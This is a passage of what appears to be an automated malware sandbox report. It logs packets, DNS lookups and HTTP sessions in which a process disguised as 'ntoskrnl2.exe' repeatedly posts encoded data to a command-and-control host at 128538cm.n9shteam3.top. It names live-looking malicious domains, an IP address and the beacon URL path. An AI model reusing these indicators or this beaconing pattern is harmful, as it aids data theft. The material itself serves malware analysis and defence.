                                                            Sep 2, 2024 13:35:48.774874926 CEST4988480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:48.779805899 CEST804988480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:49.061068058 CEST804988480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:49.102981091 CEST4988480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:49.185448885 CEST804988480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:49.237402916 CEST4988480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:49.328351974 CEST4988480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:49.330028057 CEST4988580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:49.334372997 CEST804988480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:49.334438086 CEST4988480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:49.335406065 CEST804988580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:49.335463047 CEST4988580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:49.335589886 CEST4988580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:49.340357065 CEST804988580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:49.727447033 CEST4988580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:49.732527018 CEST804988580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:49.999872923 CEST804988580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:50.088329077 CEST4988580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:50.133835077 CEST804988580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:50.254156113 CEST4988580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:50.254970074 CEST4988680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:50.260015011 CEST804988580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:50.260149002 CEST4988580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:50.260185003 CEST804988680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:50.260335922 CEST4988680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:50.260335922 CEST4988680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:50.265140057 CEST804988680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:50.621217966 CEST4988680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:50.739290953 CEST804988680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:50.919668913 CEST804988680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:50.994293928 CEST4988680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:51.146625996 CEST804988680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:51.244808912 CEST4988680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:51.273242950 CEST4988680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:51.274152040 CEST4988780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:51.278835058 CEST804988680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:51.278886080 CEST4988680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:51.278933048 CEST804988780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:51.279005051 CEST4988780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:51.279153109 CEST4988780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:51.283921957 CEST804988780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:51.635016918 CEST4988780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:51.639903069 CEST804988780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:51.870089054 CEST4988880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:51.874936104 CEST804988880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:51.875009060 CEST4988880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:51.875073910 CEST4988880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:51.879941940 CEST804988880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:51.926815033 CEST804988780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:51.977933884 CEST4988780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:52.057172060 CEST804988780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:52.176879883 CEST4988780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:52.176886082 CEST4988980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:52.181782007 CEST804988980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:52.182002068 CEST804988780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:52.182354927 CEST4988780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:52.182358027 CEST4988980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:52.184747934 CEST4988980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:52.189506054 CEST804988980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:52.228024006 CEST4988880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:52.232918978 CEST804988880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:52.232975960 CEST804988880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:52.541008949 CEST804988880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:52.541037083 CEST4988980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:52.545840025 CEST804988980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:52.603701115 CEST4988880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:52.669306993 CEST804988880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:52.806293011 CEST4988880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:52.836296082 CEST804988980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:52.977931023 CEST4988980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:53.056766987 CEST804988980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:53.193556070 CEST4988880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:53.193614960 CEST4988980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:53.194363117 CEST4989080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:53.199350119 CEST804989080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:53.199363947 CEST804988880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:53.199426889 CEST804988980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:53.199429035 CEST4989080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:53.199445963 CEST4988880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:53.199484110 CEST4988980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:53.199646950 CEST4989080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:53.204569101 CEST804989080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:53.556143045 CEST4989080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:53.561676979 CEST804989080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:53.848170996 CEST804989080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:53.965821981 CEST4989080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:53.973728895 CEST804989080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:54.104371071 CEST4989080192.168.2.680.211.144.156

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 2, 2024 13:33:15.743927956 CEST5685353192.168.2.61.1.1.1
                                                            Sep 2, 2024 13:33:15.751626015 CEST53568531.1.1.1192.168.2.6
                                                            Sep 2, 2024 13:33:40.464283943 CEST6467153192.168.2.61.1.1.1
                                                            Sep 2, 2024 13:33:40.656140089 CEST53646711.1.1.1192.168.2.6

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Sep 2, 2024 13:33:15.743927956 CEST192.168.2.61.1.1.10xb068Standard query (0)keyauth.winA (IP address)IN (0x0001)false
                                                            Sep 2, 2024 13:33:40.464283943 CEST192.168.2.61.1.1.10x6190Standard query (0)128538cm.n9shteam3.topA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Sep 2, 2024 13:33:15.751626015 CEST1.1.1.1192.168.2.60xb068No error (0)keyauth.win104.26.0.5A (IP address)IN (0x0001)false
                                                            Sep 2, 2024 13:33:15.751626015 CEST1.1.1.1192.168.2.60xb068No error (0)keyauth.win104.26.1.5A (IP address)IN (0x0001)false
                                                            Sep 2, 2024 13:33:15.751626015 CEST1.1.1.1192.168.2.60xb068No error (0)keyauth.win172.67.72.57A (IP address)IN (0x0001)false
                                                            Sep 2, 2024 13:33:40.656140089 CEST1.1.1.1192.168.2.60x6190No error (0)128538cm.n9shteam3.top80.211.144.156A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • 128538cm.n9shteam3.top

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.64973280.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:33:40.822514057 CEST345OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:33:41.181931019 CEST344OUTData Raw: 05 02 04 0c 06 0d 01 07 05 06 02 01 02 04 01 06 00 04 05 0b 02 01 03 0e 02 01 0e 07 04 03 00 07 0d 54 04 5d 01 0d 07 02 0e 05 02 06 05 54 04 06 06 01 0e 00 0d 50 06 05 06 0e 06 53 06 0a 07 0c 00 50 0e 0f 04 05 06 09 0c 02 0e 03 0d 03 0c 08 02 01
                                                            Data Ascii: T]TPSPSV\L}Pk^u[c\b_vuxARuvok_s]^xszpTn`wgZje~V@@{mTL~bi
                                                            Sep 2, 2024 13:33:41.477550030 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:41.567852020 CEST1236INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:40 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 1380
                                                            Connection: keep-alive
                                                            Data Raw: 56 4a 7e 01 7b 53 5a 5b 78 62 77 5c 7f 4f 74 59 7e 77 51 0d 7c 4e 71 0d 6e 73 63 58 6a 71 6c 00 77 4d 61 0c 79 62 69 02 75 66 74 03 7c 71 78 01 55 4b 71 0b 60 5c 7c 5b 7d 72 57 05 7c 77 65 54 6f 5f 70 0d 7c 73 7f 04 61 4c 61 4f 60 58 75 48 68 5f 66 49 7e 55 7c 4e 7d 5e 7f 07 75 66 7b 06 7c 5b 6e 5d 69 70 62 58 6f 67 6b 5d 7b 64 6c 00 78 43 55 05 6d 71 78 00 6f 60 7e 4c 6b 5e 5a 07 6c 67 74 4a 7e 5c 7f 4e 77 61 60 48 7a 51 41 5b 6b 49 5a 08 7c 4f 5c 51 61 6f 6c 04 78 6f 7c 49 74 5e 7e 0a 79 07 6e 58 6a 52 79 5a 7b 71 5b 59 75 5d 7b 4b 76 4f 73 5b 60 58 7a 50 7e 5d 7a 06 77 62 6e 5d 61 66 73 50 7e 7c 65 00 77 6f 74 04 7e 70 7c 01 6f 6f 7f 03 6c 5e 66 00 7c 6d 60 08 60 67 6c 04 69 62 66 09 7d 6d 51 40 6f 6e 6d 5b 7d 4c 75 06 7b 5d 46 51 7d 7c 52 0c 6a 60 52 41 6a 67 65 5f 7b 6d 5e 58 6c 61 78 02 7c 71 77 06 7d 01 7b 4f 7c 60 6a 55 6e 5a 60 42 69 4c 60 48 77 60 61 51 7b 5c 79 49 76 76 78 48 7c 76 52 03 7d 58 71 0d 77 72 59 49 7d 72 75 06 7f 49 6a 0a 79 66 70 0b 7c 63 73 02 76 5c 7d 07 77 61 79 4a 7c 61 [TRUNCATED]
                                                            Data Ascii: VJ~{SZ[xbw\OtY~wQ|NqnscXjqlwMaybiuft|qxUKq`\|[}rW|weTo_p|saLaO`XuHh_fI~U|N}^uf{|[n]ipbXogk]{dlxCUmqxo`~Lk^ZlgtJ~\Nwa`HzQA[kIZ|O\Qaolxo|It^~ynXjRyZ{q[Yu]{KvOs[`XzP~]zwbn]afsP~|ewot~p|ool^f|m``glibf}mQ@onm[}Lu{]FQ}|Rj`RAjge_{m^Xlax|qw}{O|`jUnZ`BiL`Hw`aQ{\yIvvxH|vR}XqwrYI}ruIjyfp|csv\}wayJ|az~|pN}Icwac{rS|paxwhxwxM{mYxrxxsfL}`|DxYdJ~bNuO^I}lwH|gt}q}v|^Nx|dv`zyau|lXxObwcUDvadvaz@~pX@t\uMwelBuBv|`M|c|{l]{Nz|SptgxO~Lf|}oxCzL~ba@|NpB||~^p|gb{}QyrZHOsI}YUO|pazstL}LxtcW@zaevXh~Xd}XSAtLQbagXxXtO}]gGwraOwa[|_PH~RlN}IgDvqQH{b}J~piJ{gRywZxmkxr`{c~{]NZxgxK~rd^uqd}R{K|dhkaavo_{lUYt^f@z_WHiRT_z\yvxBagx[L~JxYzcr~^uuoQkUiL`lc]ssZy|d[{Yu^}~sUww{Z}LfzSYQVq}@T[\\hl{BhowSYgPte\Q~d{oa]U^FitRjKV]YSXQGZZbOWXfI[IDjwDSzrH][thc~YP]a@oeNQt{HvamNw_SOjiBsUwkaaQxL}IipaKotLltlLyz{RO_o`AP|o]WdUP[`O\bcJW{{YVM|qmLulpLyR|Kp]@PnbFPKo_D`xC\}^_v\}vklPPnaLYH{|P`bpQN\koEUNo_FjsUcU@R_~zRTQ@ulRzE [TRUNCATED]
                                                            Sep 2, 2024 13:33:41.567867041 CEST301INData Raw: 05 7b 5d 05 59 56 4a 71 63 54 01 73 4a 7a 5e 45 59 62 04 6e 40 5a 72 40 01 6b 07 5f 44 68 0a 7b 4f 54 64 07 03 5b 5b 5e 74 57 04 6a 5c 7a 5e 57 5a 60 65 74 5d 7a 70 73 5b 6c 6e 0b 46 55 7e 63 5f 54 60 02 50 6b 06 00 02 54 5d 67 4a 56 63 03 5f 5a
                                                            Data Ascii: {]YVJqcTsJz^EYbn@Zr@k_Dh{OTd[[^tWj\z^WZ`et]zps[lnFU~c_T`PkT]gJVc_Zb`Y|Q|dP^]hbe^mk^QgKpsT}prDi`yFlvXtt|]bbA[}aWPcQ`@\vUMkoh^kdpQA|YW_P{J]d]FRZRQTnZRXbxkcT{RVPy]FQiaBV~Jl]DiJ[WtZUcbT}]V\y_BXcfNWrHb
                                                            Sep 2, 2024 13:33:41.625276089 CEST321OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 380
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:41.830750942 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:41.830955982 CEST380OUTData Raw: 55 57 5a 50 5e 41 5c 56 5b 5f 56 5a 57 5d 50 58 55 5f 5e 48 50 5a 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UWZP^A\V[_VZW]PXU_^HPZZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$&!%^(+7'2['*^?(^8$0)U?(*' =9:%^./]+
                                                            Sep 2, 2024 13:33:42.130362988 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:41 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 23 0b 37 34 2f 54 25 02 37 07 29 00 2d 06 28 2d 0e 06 2d 11 3b 00 25 3a 2f 5a 2a 21 31 53 26 29 0c 05 29 3c 03 5b 28 0c 31 56 22 24 20 5b 03 1f 25 16 23 22 25 0e 31 28 2d 5a 30 37 2a 59 20 24 24 5a 28 3e 32 18 24 5b 38 59 23 32 2d 0f 38 04 22 1a 25 5e 23 07 3a 2c 2a 14 25 14 2a 56 08 16 38 1c 29 2c 0b 06 34 34 24 00 37 01 3d 54 34 36 30 0b 33 1d 05 1c 27 2a 3a 0f 24 07 33 55 28 2e 23 5f 30 39 3a 02 20 0d 07 18 2d 29 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: #74/T%7)-(--;%:/Z*!1S&))<[(1V"$ [%#"%1(-Z07*Y $$Z(>2$[8Y#2-8"%^#:,*%*V8),44$7=T4603'*:$3U(.#_09: -)$P.-V0WS
                                                            Sep 2, 2024 13:33:42.192636013 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:42.402674913 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:42.403249025 CEST1340OUTData Raw: 55 52 5a 5f 5e 49 5c 50 5b 5f 56 5a 57 55 50 59 55 5c 5e 47 50 5b 5a 5c 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: URZ_^I\P[_VZWUPYU\^GP[Z\YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$'!]+$)Z$2<-'$]'5*;#)B$[):.%^./]+
                                                            Sep 2, 2024 13:33:43.014805079 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 23 0c 20 24 28 0c 26 3b 24 1d 3e 00 36 5e 28 04 3c 09 39 3f 20 11 27 39 33 13 3c 54 25 57 24 29 2d 5a 29 2f 31 58 28 31 3e 0c 35 34 20 5b 03 1f 26 05 20 31 29 0f 25 3b 39 5c 30 27 0c 16 35 27 28 5b 3e 04 2d 0f 25 3d 15 04 23 1f 03 0c 3b 04 26 52 26 3b 3f 06 2f 2f 32 16 32 14 2a 56 08 16 38 1d 2b 05 25 04 23 19 2b 5d 21 3b 3a 0c 37 40 33 56 27 33 0a 0a 33 3a 22 0a 27 2d 33 54 28 3d 2f 59 26 2a 3a 03 34 33 2a 0b 2e 03 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: # $(&;$>6^(<9? '93<T%W$)-Z)/1X(1>54 [& 1)%;9\0'5'([>-%=#;&R&;?//22*V8+%#+]!;:7@3V'33:"'-3T(=/Y&*:43*.$P.-V0WS


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.64973380.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:33:41.828704119 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:42.181035042 CEST1028OUTData Raw: 50 54 5f 51 5e 41 59 57 5b 5f 56 5a 57 5c 50 5e 55 5c 5e 47 50 53 5a 59 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PT_Q^AYW[_VZW\P^U\^GPSZYYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$$+<0"1Y$-&Y+/;7$?8/*$<*"59%^./]+,
                                                            Sep 2, 2024 13:33:42.497225046 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:42.687994003 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.64973480.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:33:42.866833925 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:43.212471008 CEST1028OUTData Raw: 55 50 5a 56 5e 46 59 57 5b 5f 56 5a 57 55 50 5e 55 5e 5e 45 50 53 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UPZV^FYW[_VZWUP^U^^EPSZ_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Y0W.+'X%2!^%-6^<=;$03,+;$V)#*29-%^./]+
                                                            Sep 2, 2024 13:33:43.483005047 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:43.611737967 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.64973580.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:33:43.745134115 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:44.102916956 CEST1028OUTData Raw: 55 50 5f 56 5b 46 59 5c 5b 5f 56 5a 57 59 50 58 55 5f 5e 44 50 58 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UP_V[FY\[_VZWYPXU_^DPXZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$$2-<(,3!^%.)?-;;7$?=U<0T(7<[>"6/*%^./]+8
                                                            Sep 2, 2024 13:33:44.388576031 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:44.513240099 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:43 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.64973680.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:33:44.681550026 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:45.040632963 CEST1028OUTData Raw: 55 5f 5a 57 5b 46 5c 53 5b 5f 56 5a 57 5e 50 5a 55 50 5e 42 50 59 5a 59 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U_ZW[F\S[_VZW^PZUP^BPYZYYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$$!*(+ 01%['!>=/;B+&<*+(?=Y*26^-*%^./]+$
                                                            Sep 2, 2024 13:33:45.332659960 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:45.457918882 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:44 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:33:45.782109976 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:44 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.64974080.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:33:45.787583113 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
